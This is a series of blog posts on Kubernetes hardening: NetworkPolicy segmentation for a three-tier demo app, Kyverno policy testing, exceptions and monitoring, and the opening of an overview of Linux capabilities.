But how does a NetworkPolicy really work? These guardrails operate at the network (L3) and transport (L4) layers. In practice that means you’re defining which pod groups (by label/namespace) can connect to which other pods (L3: IP/addressing), and on which ports and protocols (L4: TCP/UDP). It’s the foundation for segmentation, not yet looking inside the traffic itself, just deciding who’s allowed to talk and what ports they can use. Later in the series we’ll climb up the stack into application-aware (L7) controls, but this post is about getting the baseline right at L3/L4.
We’ll start here with the basics: a three-tier app (frontend → backend → database), a default-deny posture, and a small set of explicit allows to make it work. Along the way we’ll pick up lessons, gotchas, and maybe a few regrets from trial and error.

The Test App (Deploy + Baseline Verification)
Let's dive into our simple three-tier demo. Nothing fancy — just enough to show how service boundaries play out in practice:

Frontend namespace: a web pod (nginx or a tiny app) labeled app=web
Backend namespace: an API pod labeled app=api
DB namespace: a PostgreSQL pod labeled app=postgres

Traffic flow:
frontend:web  --->  backend:api  --->  db:postgres
Goal boundaries:  

Frontend → Backend on 80/TCP only  
Backend → DB on 5432/TCP only  
DNS egress allowed everywhere  
Everything else: blocked

Deploy the demo app (single manifest)
This will give you everything you need: namespaces, workloads, and services. Save as test-app.yaml and apply with kubectl apply -f test-app.yaml.
apiVersion: v1
kind: Namespace
metadata:
  name: frontend
  labels:
    tier: frontend
---
apiVersion: v1
kind: Namespace
metadata:
  name: backend
  labels:
    tier: backend
---
apiVersion: v1
kind: Namespace
metadata:
  name: db
  labels:
    tier: db
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: web
  namespace: frontend
  labels:
    app: web
spec:
  replicas: 1
  selector:
    matchLabels:
      app: web
  template:
    metadata:
      labels:
        app: web
    spec:
      containers:
        - name: nginx
          image: nginx:1.27-alpine
          ports:
            - containerPort: 80
---
apiVersion: v1
kind: Service
metadata:
  name: web
  namespace: frontend
spec:
  selector:
    app: web
  ports:
    - name: http
      port: 80
      targetPort: 80
      protocol: TCP
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: api
  namespace: backend
  labels:
    app: api
spec:
  replicas: 1
  selector:
    matchLabels:
      app: api
  template:
    metadata:
      labels:
        app: api
    spec:
      containers:
        - name: nginx
          image: nginx:1.27-alpine
          ports:
            - containerPort: 80
---
apiVersion: v1
kind: Service
metadata:
  name: api
  namespace: backend
spec:
  selector:
    app: api
  ports:
    - name: http
      port: 80
      targetPort: 80
      protocol: TCP
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: postgres
  namespace: db
  labels:
    app: postgres
spec:
  replicas: 1
  selector:
    matchLabels:
      app: postgres
  template:
    metadata:
      labels:
        app: postgres
    spec:
      containers:
        - name: postgres
          image: postgres:15-alpine
          env:
            - name: POSTGRES_PASSWORD
              value: pass
          ports:
            - containerPort: 5432
---
apiVersion: v1
kind: Service
metadata:
  name: postgres
  namespace: db
spec:
  selector:
    app: postgres
  ports:
    - name: pg
      port: 5432
      targetPort: 5432
      protocol: TCP


After a minute or two, you should have:  

web.frontend.svc.cluster.local (HTTP 80)  
api.backend.svc.cluster.local (HTTP 80)  
postgres.db.svc.cluster.local (TCP 5432)


Test pods (netshoot) for quick verification

netshoot is a Docker Networking Trouble-shooting Swiss-Army Container, so useful for this exercise

Let's see what the default behavior is. We want to make sure everything is connected. We'll run a temporary shell in each namespace and test commands in each namespace:
From frontend shell:
matt@controlplane:~/np$ kubectl run -n frontend test --image=nicolaka/netshoot -it --rm -- bash
If you don't see a command prompt, try pressing enter.
test:~# curl -sS http://api.backend.svc.cluster.local:80



Welcome to nginx!



Welcome to nginx!
If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.

For online documentation and support please refer to
nginx.org.

Commercial support is available at
nginx.com.

Thank you for using nginx.


test:~#

From backend shell:
matt@controlplane:~/np$ kubectl run -n backend test --image=nicolaka/netshoot -it --rm -- bash
If you don't see a command prompt, try pressing enter.
test:~# nc -vz postgres.db.svc.cluster.local 5432
Connection to postgres.db.svc.cluster.local (10.110.205.214) 5432 port [tcp/postgresql] succeeded!
test:~#

From anywhere:
test:~# dig +short google.com #google ip
142.251.46.206
test:~#

Cool. With no NetworkPolicies, these will all work. Of course, the goal is to not have everything work. Let's get that process going.

Default-Deny Everything
The first rule of any security posture: deny, deny, deny. Ok maybe those are three rules, but you get the point.
The first rule of network policy: flip the cluster from “allow all” to “deny by default.”  
We've established the Kubernetes default configuration allows every pod to talk to every other pod. To change that, we apply a very basic network policy with an empty podSelector (which matches all pods in the namespace) and no rules. That blocks all ingress and egress.
Here’s a default-deny you can drop into each namespace. Just save in a single file called deny-policy.yaml.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny
  namespace: frontend
spec:
  podSelector: {}
  policyTypes: ["Ingress", "Egress"]
---
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny
  namespace: backend
spec:
  podSelector: {}
  policyTypes: ["Ingress", "Egress"]
---
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny
  namespace: db
spec:
  podSelector: {}
  policyTypes: ["Ingress", "Egress"]

Walkthrough

Apply file via kubectl apply -f deny-policy.yaml to create the relevant network policies.
Every pod in those namespaces will now be isolated, no incoming or outgoing connections.  
DNS lookups will also break, since egress is blocked by default. 

Quick Test
Spin up a netshoot pod in the frontend namespace and try some basics:
kubectl run -n frontend test --image=nicolaka/netshoot -it --rm -- bash

# Inside the pod:
curl http://api.backend.svc.cluster.local:80  
dig google.com

Both of these should now fail. Sadly, we've gone from no segmentation to deny everything. Not exactly helpful. But from here, we’ll add back the minimum connections the app needs to function. 
One thing we’re not doing here is deleting the default-deny policy. That remains our baseline. Every new rule we add (like our soon to come DNS carve-out) is layered on top of the default deny. Think of it as our safety blanket.

Allow DNS Egress
Once we flipped everything to default-deny, out first casualty was DNS lookups stopped working. That’s expected, since every pod in frontend, backend, and db is now cut off from making any outbound connection, including the very boring-but-essential queries to the cluster DNS service. Even a simple dig google.com from your netshoot pods fails.
Why DNS matters to the app:  

Service discovery. Pods usually talk to each other by service names (api.backend.svc.cluster.local), not IPs. Without DNS, those names don’t resolve and your “frontend → backend” call breaks.  
External calls. If a pod talks to anything outside the cluster (API, S3, etc.), it resolves by name first. No DNS = instant failure.  
Certs & health checks. TLS handshakes and readiness probes often rely on hostnames. Break DNS and you’ll see flaky startups or cert errors.  

So we explicitly allow egress only to the cluster DNS service (CoreDNS/kube-dns in kube-system) on UDP/TCP 53. This does not open general internet egress; it simply lets pods ask, “what IP is api.backend.svc.cluster.local?” and go back to being productive.
Here’s a allow dns you can drop into each namespace. Just save in a single file called dns-networkpolicy.yaml.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-dns-egress
  namespace: frontend
spec:
  podSelector: {}
  policyTypes: ["Egress"]
  egress:
    - to:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: kube-system
          podSelector:
            matchLabels:
              k8s-app: kube-dns
      ports:
        - protocol: UDP
          port: 53
        - protocol: TCP
          port: 53
---
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-dns-egress
  namespace: backend
spec:
  podSelector: {}
  policyTypes: ["Egress"]
  egress:
    - to:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: kube-system
          podSelector:
            matchLabels:
              k8s-app: kube-dns
      ports:
        - protocol: UDP
          port: 53
        - protocol: TCP
          port: 53
---
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-dns-egress
  namespace: db
spec:
  podSelector: {}
  policyTypes: ["Egress"]
  egress:
    - to:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: kube-system
          podSelector:
            matchLabels:
              k8s-app: kube-dns
      ports:
        - protocol: UDP
          port: 53
        - protocol: TCP
          port: 53

I am not 100% sure k8s-app=kube-dns always works. But this works on my kubeadm cluster with Calico CNI.
Walkthrough

Apply file via kubectl apply -f dns-networkpolicy.yaml to create the relevant network policies.
This doesn’t allow full internet egress, just DNS queries to kube-dns.  
Now you can run dig google.com from your netshoot pods and get a valid response again.

Quick Test
matt@controlplane:~/np$ kubectl run -n frontend test --image=nicolaka/netshoot -it --rm -- bash
If you don't see a command prompt, try pressing enter.
test:~# dig +short google.com
142.250.176.14
test:~#

Cool, works as we want. With DNS restored, your apps can resolve service names and external domains, but all other connections are still blocked. Next we’ll add back the actual service-to-service flows that make the three-tier app work.

Allow Service-to-Service Flows
With DNS back in place, pods can at least resolve names again, but traffic is still at a stop. That’s exactly what we want: default-deny baseline plus a single DNS carve-out. Now it’s time to add back the flows that actually make our three-tier app work.
Frontend → Backend
Our frontend pods need to call the backend API on TCP 80. That means we have to allow two directions:  

Egress from the frontend pods to the backend namespace on port 80.  
Ingress into the backend pods, but only from the frontend namespace and only on that port.  

Here’s an allow frontend to backend you can drop into each namespace. Just save in a single file called front-to-back-networkpolicy.yaml.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-egress-to-backend
  namespace: frontend
spec:
  podSelector: {}  # or matchLabels: {app: web} if you want to scope to just the web pods
  policyTypes: ["Egress"]
  egress:
    - to:
        - namespaceSelector:
            matchLabels:
              tier: backend
          podSelector:
            matchLabels:
              app: api
      ports:
        - protocol: TCP
          port: 80
---
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-frontend-to-backend
  namespace: backend
spec:
  podSelector:
    matchLabels:
      app: api
  ingress:
    - from:
        - namespaceSelector:
            matchLabels:
              tier: frontend
      ports:
        - protocol: TCP
          port: 80

Backend → Database
Next, backend pods need to talk to Postgres on TCP 5432. Just like with frontend → backend, that means two pieces:  

Egress from the backend pods to the db namespace on port 5432.  
Ingress into the db pods, but only from the backend namespace and only on that port.  

Here’s a allow backend to db you can drop into each namespace. Just save in a single file called back-to-db-networkpolicy.yaml.
# Egress from backend → db
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-backend-egress-to-db
  namespace: backend
spec:
  podSelector: {}
  policyTypes: ["Egress"]
  egress:
    - to:
        - namespaceSelector:
            matchLabels:
              tier: db
          podSelector:
            matchLabels:
              app: postgres
      ports:
        - protocol: TCP
          port: 5432
---
# Ingress into db from backend
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-backend-to-db
  namespace: db
spec:
  podSelector:
    matchLabels:
      app: postgres
  ingress:
    - from:
        - namespaceSelector:
            matchLabels:
              tier: backend
      ports:
        - protocol: TCP
          port: 5432

Walkthrough

Apply these policies on top of the default-deny and DNS rules.  
Frontend → Backend on port 80 should now succeed.  
Backend → DB on port 5432 should now succeed.  
Any other cross-namespace attempt (like frontend → db or db → backend) still fails.  

Quick Test
From frontend shell:
matt@controlplane:~/np$ kubectl run -n frontend test --image=nicolaka/netshoot -it --rm -- bash
If you don't see a command prompt, try pressing enter.
test:~# curl -sS http://api.backend.svc.cluster.local:80



Welcome to nginx!



Welcome to nginx!
If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.

For online documentation and support please refer to
nginx.org.

Commercial support is available at
nginx.com.

Thank you for using nginx.


test:~#

From backend shell:
matt@controlplane:~/np$ kubectl run -n backend test --image=nicolaka/netshoot -it --rm -- bash
If you don't see a command prompt, try pressing enter.
test:~# nc -vz postgres.db.svc.cluster.local 5432
Connection to postgres.db.svc.cluster.local (10.110.205.214) 5432 port [tcp/postgresql] succeeded!
test:~#

At this point we’ve re-enabled just enough traffic for the app to function: frontend → backend → db, plus DNS everywhere. Everything else remains blocked. That’s baseline L3/L4 segmentation in action.
Now if you doubted me on the DNS thing, just delete that policy and try front to backend. Good luck.

What We Just Built
Now let's step back for a second. We started with a cluster that was flat and wide open: every pod could talk to every other pod, in every namespace, on every port. That’s the default state of Kubernetes networking, convenient but quite insecure.
Now look at where we are:

Default-deny baseline: nothing moves unless we say so.  
DNS carve-out: pods can still resolve service names and external hosts, but nothing else is open-ended.  
Frontend → Backend on :80: the app’s public entry point can reach the API tier, and that’s it.  
Backend → DB on :5432: the API tier can query the database, but it’s walled off from everything else.  
Everything else blocked: no random cross-namespace chatter, no sneaky egress to the internet.  

What we’ve really built here is a 3-hop app chain: frontend → backend → database, with DNS as the plumbing. Instead of a spaghetti mess of possible connections, the graph collapses down to just the flows the app is supposed to have. 
This is least privilege at L3/L4. And it is dead simple, no service mesh required. Just a handful of manifests that take Kubernetes from “anyone can talk to anyone” to “only these three things can talk, on these two ports.” Not bad.

Lateral Movement, Blocked
So we get a nice win. Without policies, landing in the frontend provides the run of the cluster. Curl into the backend, hop into the database, and keep poking at other namespaces until something breaks. That's on us, not Kubernetes.
With our policies in place, the world just got a lot smaller:  

In frontend, you can only send traffic to backend’s API service on port 80. No database, no random namespaces, no internet egress.  
In backend, you can only reach Postgres on port 5432. No shortcut to frontend, no talking to other services.  
The db tier is a walled garden. It only listens to backend, and that’s it.  

Every other path is cut off. We’ve shrunk the surface area from “everything-to-everything” down to a single three-hop chain. Peace out, lateral movement.

What’s Next (Scaling with Calico)
That’s the baseline: Kubernetes NetworkPolicy gave us simple, effective service boundaries at the L3/L4 level. It works. But what happens when you’re running dozens of namespaces? How do you enforce organization-wide defaults without copy-pasting YAML everywhere? Admission controller sure (oh yeah I wrote about that), but we shouldn't need it for everything Kubernetes. 
That’s where Calico comes in. In Part 2, we’ll take this same model and scale it with Calico’s GlobalNetworkPolicies, NetworkSets, and built-in flow logs. It’s the same idea of least privilege, but with tools designed to handle more than a three-tier demo app.
Stay tuned loyal reader.



Control Issues: From Policy to Practice
Matt Brown — Wed, 20 Aug 2025 01:32:50 GMT
You can get a lot done in Kubernetes just by blocking bad stuff at admission time. That’s where we left things in Part 2. We installed Kyverno, wrote policies, and saw workloads getting stopped before they cause trouble. We also saw things like mutations and generating resources on the fly. It was all fairly straightforward.
But how can we take Kyverno to the next level without just writing a couple of ClusterPolicy YAMLs and calling it a day? Policies don’t live in a vacuum. They need testing, exceptions, tuning, and visibility into what’s actually happening in your cluster. And the cool thing is, all of that is built into Kyverno or available in one of its side projects.
In Part 3 of this series, we’re moving past “first policy” territory and into operations. We’ll cover:

Matching what gets blocked  
Testing policies before they hit the cluster with kyverno test  
Making exceptions without throwing away your guardrails  
Borrowing from the upstream policy library for quick wins like securityContext hardening and volume restrictions  
Observing policy activity with Prometheus metrics and Policy Reporter dashboards  

The goal here isn’t to write more YAML. It’s to build a feedback loop where your policies get better, your exceptions are targeted, and you can actually prove the impact of your enforcement. As usual, let's get to it.

Match, Exclude, and the Patterns That Follow
Before we pile on tests, exceptions, and dashboards, let’s be crystal clear on how a rule decides it applies and what happens next. Most “why did this block?” mysteries boil down to match logic or pattern evaluation, simple as that..  
Rule Evaluation Order
For each incoming request, Kyverno runs through this sequence:  

Match – does the resource match match.resources? If not, skip.  
Exclude – does it also match exclude.resources? If yes, skip.  
Preconditions – optional extra checks (e.g. JMESPath). If false, skip.  
Action – run the rule (validate, mutate, generate, or verify).  


Note: mutations always happen before validations.  

If you’re confused about match vs exclude, you’re not alone. The docs aren’t explicit about ordering, but the source makes it clear: match first, exclude second. Of course that makes sense as optimal, but still.
AND vs OR Logic

Inside a single resources block, fields are ANDed. All must match.  
Use any: to OR multiple resources blocks.  

# Pods in prod namespace AND labeled app=backend
match:
  resources:
    kinds: ["Pod"]
    namespaces: ["prod"]
    selector:
      matchLabels:
        app: backend

# Pods in prod namespace OR labeled app=backend
match:
  any:
    - resources:
        kinds: ["Pod"]
        namespaces: ["prod"]
    - resources:
        kinds: ["Pod"]
        selector:
          matchLabels:
            app: backend

Match Quick Reference




Field What it does Notes



kinds Resource kind (Pod, Deployment, etc.) Case-sensitive.

names Specific object names Exact match only.

namespaces Namespace name(s) Ignored for cluster-scoped kinds.

selector Labels on the resource Standard matchLabels/matchExpressions.

annotations Match by annotations Same syntax as labels.

operations Admission verbs CREATE, UPDATE, DELETE, CONNECT.

userInfo Who made the request Roles, clusterRoles, users, service accounts.


To use:

resources: select by names, namespaces, kinds, operations, labels, annotations, and namespace selectors.  
subjects: select users, groups, and service accounts.  
roles: select namespaced roles.  
clusterRoles: select cluster-wide roles.  

Preconditions
If match/exclude got you in the door, preconditions let you add “only if…” filters. They run after match/exclude but before action.  
# Only when hostNetwork=true
preconditions:
  all:
    - key: "{{ request.object.spec.hostNetwork }}"
      operator: Equals
      value: true

Great for scoping rules by field presence, among other things. 
Patterns: The Real Work
Once a rule applies, Kyverno still needs to know what inside the YAML you care about. That’s where pattern (or anyPattern) comes in.  
Patterns are structural YAML matches, not regexes. You describe the shape/values you expect, and Kyverno checks them.  

pattern — all conditions must be satisfied.  
anyPattern — resource passes if it matches any of the listed patterns.  

validate:
  pattern:
    spec:
      securityContext:
        runAsNonRoot: true

validate:
  anyPattern:
    - spec:
        securityContext:
          runAsUser: 1000
    - spec:
        securityContext:
          runAsNonRoot: true

This is just scratching the surface, but it gives a basic overview to use Kyverno effectively.
A Note on CEL
Patterns today are Kyverno’s own YAML-driven DSL with some JMESPath helpers. CEL support is coming (and will eventually unify expression logic across Kubernetes), but for now: stick with patterns.  

Testing Policies with kyverno test
Before you unleash a new policy on your cluster, it’s worth testing it locally. That’s what kyverno test is for: simulating policy evaluations against sample resources, without creating or blocking anything in Kubernetes.
Unlike kyverno apply, which is handy for quick checks, kyverno test is built for programmatic, repeatable testing. It evaluates match criteria (kinds, namespaces, labels, annotations) exactly like the admission controller would, so you can see which rules apply and which get skipped.
Example Policy
Here’s our block-hostpath.yaml validating policy from Part 2:
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: block-hostpath
spec:
  validationFailureAction: Enforce
  rules:
    - name: disallow-hostpath
      match:
        resources:
          kinds:
            - Pod
          selector:
            matchLabels:
              app: kyverno-demo
      validate:
        message: "hostPath volumes are not allowed."
        pattern:
          spec:
            volumes:
              - =(hostPath): "absent"

Notice the selector, which means this rule only applies to Pods labeled app=kyverno-demo. If your resource doesn’t match that, the test will skip it.
Setting Up a Test Directory
Let's create a place to store our tests. This will make it more manageable as you would expect.
mkdir kyverno-tests
cd kyverno-tests
cp /path/to/block-hostpath.yaml .

Create a Passing and Failing Pod
Bad Pod (should fail):
apiVersion: v1
kind: Pod
metadata:
  name: bad-pod
  labels:
    app: kyverno-demo
spec:
  containers:
    - name: nginx
      image: nginx
  volumes:
    - name: root-mount
      hostPath:
        path: /

Good Pod (should pass):
apiVersion: v1
kind: Pod
metadata:
  name: good-pod
  labels:
    app: kyverno-demo
spec:
  containers:
    - name: nginx
      image: nginx

Create a Test
Now let’s create a test manifest to check both pods against the policy.
apiVersion: cli.kyverno.io/v1alpha1
kind: Test
metadata:
  name: kyverno-test
policies:
  - block-hostpath.yaml
resources:
  - bad-pod.yaml
  - good-pod.yaml
results:
- policy: block-hostpath
  rule: disallow-hostpath
  result: pass

This tells the Kyverno CLI three things:

policies: which policy files to load (block-hostpath.yaml)  
resources: which resource manifests to run those policies against (bad-pod.yaml, good-pod.yaml)  
results: what you expect to happen. Here, the disallow-hostpath rule should pass for the given resource.

Running the Test
Save the manifest as kyverno-test.yaml and run:
kyverno test .

Example output:
│ ID │ POLICY         │ RULE              │ RESOURCE                │ RESULT │ REASON              │
│────│────────────────│───────────────────│─────────────────────────│────────│─────────────────────│
│ 1  │ block-hostpath │ disallow-hostpath │ v1/Pod/default/good-pod │ Fail   │ Want pass, got fail │
│ 2  │ block-hostpath │ disallow-hostpath │ v1/Pod/default/bad-pod  │ Fail   │ Want pass, got fail │

Test Summary: 0 tests passed and 2 tests failed
Error: 2 tests failed

The pods respect the policy when applied to a live cluster, but the test fails. Why? Because of how we wrote the pattern:
pattern:
  spec:
    volumes:
      - =(hostPath): "absent"

If the volumes block is completely missing, the test still fails. To handle this, we need anyPattern.
Fixing with anyPattern
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: block-hostpath-updated
spec:
  validationFailureAction: Enforce
  rules:
    - name: disallow-hostpath
      match:
        resources:
          kinds: ["Pod"]
          selector:
            matchLabels:
              app: kyverno-demo
      validate:
        message: "hostPath volumes are not allowed."
        anyPattern:
          - spec:
              =(volumes): "absent"
          - spec:
              volumes:
                - =(hostPath): "absent"

Update the test to use this policy:
apiVersion: cli.kyverno.io/v1alpha1
kind: Test
metadata:
  name: kyverno-test
policies:
  - block-hostpath-updated.yaml
resources:
  - bad-pod.yaml
  - good-pod.yaml
results:
- policy: block-hostpath-updated
  rule: disallow-hostpath
  result: pass

Run again:
│ ID │ POLICY                 │ RULE              │ RESOURCE                │ RESULT │ REASON │
│────│────────────────────────│───────────────────│─────────────────────────│────────│────────│
│ 1  │ block-hostpath-updated │ disallow-hostpath │ v1/Pod/default/good-pod │ Pass   │ Ok     │
│ 2  │ block-hostpath-updated │ disallow-hostpath │ v1/Pod/default/bad-pod  │ Fail   │ Want pass, got fail │

Test Summary: 1 tests passed and 1 tests failed
Error: 1 tests failed

Perfect! The good pod now passes while the bad pod still fails.
Next Steps
There’s much more you can do with tests, including variables, JSON patches, and negative cases. If you want to level up further, check out Chainsaw, a more advanced testing project for Kyverno.

Exceptions (Two Practical Paths)
You’ll need exceptions. The trick is making them surgical, not blanket “turn it all off.” Here are two clean approaches.
Option 1 — Use the exclude Block (Fast and Built-In)
Keep a single global policy and carve out narrowly with exclude. Four common exclusion types:
Namespace carve-out:
exclude:
  resources:
    namespaces: ["legacy-systems", "migration", "bleeding-edge"]

Predictable, but blunt. Whole namespaces get a hall pass.
Label-based carve-out:
exclude:
  resources:
    selector:
      matchLabels:
        kyverno-exempt: "true"

Tactical: mark a pod with kyverno-exempt=true and it skips evaluation.
Role-based carve-out:
exclude:
  any:
  - clusterRoles:
    - cluster-admin

If cluster-admin creates it, hands off. (Sometimes you need to respect the crown.)
Subject-targeted carve-out:
exclude:
  - subjects:
    - kind: User
      name: CloudSecBurrito

Skip checks for one named user. Minimal and very explicit.

Option 2 — PolicyException CRD (Surgical and Auditable)
When you need to exempt one rule of one policy for a specific target, use the PolicyException CRD. It doesn’t touch the original policy, and it’s easy to audit later.
You’ll need to enable it (disabled by default). Example flow:
kubectl create namespace kyverno-exceptions

kubectl -n kyverno patch deploy kyverno-admission-controller --type='json' -p='[
  {"op":"add","path":"/spec/template/spec/containers/0/args/-","value":"--enablePolicyException=true"},
  {"op":"add","path":"/spec/template/spec/containers/0/args/-","value":"--exceptionNamespace=kyverno-exceptions"}
]'

Check which versions are supported:
kubectl get crd policyexceptions.kyverno.io -o jsonpath='{range .spec.versions[*]}{.name}{"\t"}{.served}{"\t"}{.storage}{"\n"}{end}'

If you see v2 true true, your manifest should use apiVersion: kyverno.io/v2.
Example exception — exempt one pod from the block-hostpath rule:
apiVersion: kyverno.io/v2
kind: PolicyException
metadata:
  name: allow-special-pod
  namespace: kyverno-exceptions
spec:
  exceptions:
    - policyName: block-hostpath
      ruleNames: ["disallow-hostpath"]
  match:
    any:
      - resources:
          kinds: ["Pod"]
          namespaces: ["default"]
          names: ["special-pod"]

Now that pod runs, but the policy stays enforced everywhere else. Surgical, auditable, and controlled.

Monitoring Kyverno with Prometheus
You don’t need 12 dashboards to prove policies work. Just scrape Kyverno, run a couple queries, and move on. Prometheus pros can skip ahead.
Basic setup (kube-prometheus-stack)
Deploy Prometheus (yes, Grafana comes along for the ride, we’re ignoring it):
helm repo add prometheus-community https://prometheus-community.github.io/helm-charts
helm repo update
kubectl create namespace monitoring
helm install kube-prom prometheus-community/kube-prometheus-stack -n monitoring

Patch it to NodePort so you can hit it locally:
kubectl patch svc kube-prom-kube-prometheus-prometheus   -n monitoring   -p '{"spec": {"type": "NodePort"}}'
kubectl get svc kube-prom-kube-prometheus-prometheus -n monitoring -o wide

Access Prometheus at something like http://192.168.64.7:31559/. Cool. Now onto the ServiceMonitor.
Configure a ServiceMonitor for Kyverno
Create a ServiceMonitor that matches kube-prometheus-stack’s selector (release: kube-prom):
apiVersion: monitoring.coreos.com/v1
kind: ServiceMonitor
metadata:
  name: kyverno-metrics
  namespace: kyverno
  labels:
    release: kube-prom   # IMPORTANT: must match Prometheus CR serviceMonitorSelector
spec:
  selector:
    matchLabels:
      app.kubernetes.io/name: kyverno-admission-controller
  namespaceSelector:
    matchNames:
      - kyverno
  endpoints:
    - targetPort: 8000
      path: /metrics
      interval: 30s

Apply it, then check /targets in Prometheus UI to confirm Kyverno is UP.

A Couple Queries
Failures for Pods in the default namespace over the last 5 minutes (create something broken first so it is guaranteed to show data):
kyverno_policy_results_total{rule_result="fail",resource_kind="Pod",resource_namespace="default"}[5m]


Policy changes (create a new policy, then refresh the query):
kyverno_policy_changes_total

And for a quick heartbeat check, make sure Kyverno’s alive at all:
kyverno_info

That’s it. Prometheus is scraping Kyverno, queries return real numbers, and you didn’t even need to pretend to like dashboards.

Policy Reporter – Your Friendly Dashboard
For the finale, let’s spin up a dashboard. No Grafana this time — we’ll use the adjacent project Policy Reporter.
Setup
Deploy with Helm:
helm repo add policy-reporter https://kyverno.github.io/policy-reporter
helm repo update
helm install policy-reporter policy-reporter/policy-reporter --create-namespace -n policy-reporter --set ui.enabled=true

Expose it via NodePort:
kubectl patch -n policy-reporter svc policy-reporter-ui -p '{"spec": {"type": "NodePort"}}'
kubectl get svc -n policy-reporter policy-reporter-ui -o wide

Now hit it in your browser just like Prometheus, e.g. http://192.168.64.7:31864/.

You’ll see a clean UI with policy passes, failures, and violations grouped by rule and namespace.
Instant dashboards for your Kyverno policies. Turns out not all dashboards are evil after all.

Borrowing from the Upstream Policy Library
Kyverno ships with an extensive policy library you can pull from for quick, high-impact wins. Instead of writing every rule yourself, lean on what’s already been proven. A few highlights worth adopting right away:  

Restrict automounting service account tokens
Policy link
Prevents workloads from automatically mounting a service account token unless explicitly allowed. Cuts down on “accidental” privilege handouts.  

Block cluster-admin role bindings
Policy link
Stops developers (or attackers) from casually granting themselves cluster-admin. Because least privilege means least. 

Deny role escalation verbs
Policy link
Prevents roles from including verbs like escalate or impersonate that let users jump trust boundaries.  

Ban wildcard verbs in roles
Policy link
Avoids the dreaded * in RBAC rules. Force teams to think about what permissions they actually need, rather than granting everything by default.  


Each of these tackles real-world abuse paths we’ve seen exploited. They’re a fast way to raise the floor on cluster security without spending weeks hand-crafting policies.  

Wrap Up
We’ve covered a lot of ground in this trilogy.  
In Part 1, we got down to the nitty-gritty of raw admission control — even wiring up our own admission controller. We also looked at Pod Security Admission, Kubernetes’ built-in controller that’s… let’s just say, not exactly the sharpest tool in the shed.  
In Part 2, we dove into Kyverno itself. We covered the different policy types and ran through concrete, working examples.  
This series coincided with my BSides Las Vegas talk (jump to ~17:13 if you want to watch me sweat through slides). I picked Kyverno partly because of that talk, but mostly because I genuinely believe admission control should be mandatory in any Kubernetes cluster.  
I haven’t given Gatekeeper or jsPolicy their fair shake yet, but I will. I started here because Kyverno is approachable, all YAML, and still powerful. Between the CLI, policy types, and extra tooling like dashboards, it gives you everything you need to get real work done. You don’t need to gold-plate everything to be effective; Kyverno strikes a good balance between power and usability.  
The time you invest in Kyverno will pay off. Big time. And with that, after three posts, one conference talk, and far too much self-flattery, we can finally call it a wrap.  



Linux Capabilities: A Beginner's Overview
Matt Brown — Mon, 11 Aug 2025 23:29:25 GMT
Over the past few months, I’ve been testing root and non-root containers. Naturally, that led me deep into the Kubernetes securityContext: options for both pods and containers. There’s a lot packed into that field. And a handful of particularly interesting knobs that stand out:

Linux Security Modules (LSMs)  
Capabilities  
Seccomp  

But here’s the thing: all of these are just Linux. Kubernetes is merely surfacing functionality the kernel has had for decades.
I’ve already gone down the LSM rabbit hole. In that post, I focused on AppArmor. And for now, I’m resisting the urge to dive into SELinux or SMACK. So let’s call that part of the journey complete for now.
Now it’s time to explore Linux capabilities. They’re surprisingly simple once you understand the model. You can dive deep in the man page. It starts like this:

“Traditional UNIX implementations distinguish two categories of processes: privileged processes (whose effective user ID is 0, referred to as superuser or root), and unprivileged processes (whose effective UID is nonzero).
Privileged processes bypass all kernel permission checks, while unprivileged processes are subject to full permission checking based on the process's credentials.”

So where do capabilities come into play?

“Starting with Linux 2.2, Linux divides the privileges traditionally associated with superuser into distinct units, known as capabilities.”

And you can see the difference right in the kernel source.
In Linux 2.0.40, there’s no mention of capabilities at all — just hardcoded UID checks like if (!suser()) return -EPERM;. But by Linux 2.2.22, fs/open.c has been rewritten to use checks like !capable(CAP_SYS_CHROOT), showing the shift to fine-grained privilege control.
So here's the reality. In modern Linux, we shouldn’t limit risk management to root alone, because privilege isn’t binary anymore.  It’s been split into a collection of discrete powers, each represented by a capability. And if you don’t understand which ones your process holds, you might not fully understand what it can actually do.
For example:

CAP_NET_RAW: allow raw sockets
CAP_SYS_ADMIN: let's say a lot
CAP_SYS_PTRACE: ptrace() of any process
CAP_DAC_OVERRIDE: override all DAC access

Security should involve an understanding of what your workloads are already allowed to do, and what the kernel will or won’t stop. Let’s talk about Linux capabilities. 

What Are Linux Capabilities, Really?
Before Linux had capabilities, privilege was binary: you were either root (UID 0) and could do everything. Otherwise you weren’t, and got EPERM. Every privileged syscall like mount(), ptrace(), or chown() used a hardcoded check. Capabilities don’t prevent a process from making a syscall, but they do decide whether the kernel allows it to succeed.
Deep Dive
In pre-capabilities Linux (like 2.0.40), the logic behind privileged syscalls like setgid() was straightforward. In this model, if you weren’t root, you could only change your effective group ID to match your real or saved group. Anything else returned a good old-fashioned -EPERM.
asmlinkage int sys_setgid(gid_t gid)
{
    int old_egid = current->egid;

    if (suser())
        current->gid = current->egid = current->sgid = current->fsgid = gid;
    else if ((gid == current->gid) || (gid == current->sgid))
        current->egid = current->fsgid = gid;
    else
        return -EPERM;
    if (current->egid != old_egid)
        current->dumpable = 0;
    return 0;
}

So if you were root, you could change your group IDs freely. If not, you could only change your effective group ID to match your real or saved group. Otherwise? You got a good old-fashioned -EPERM.
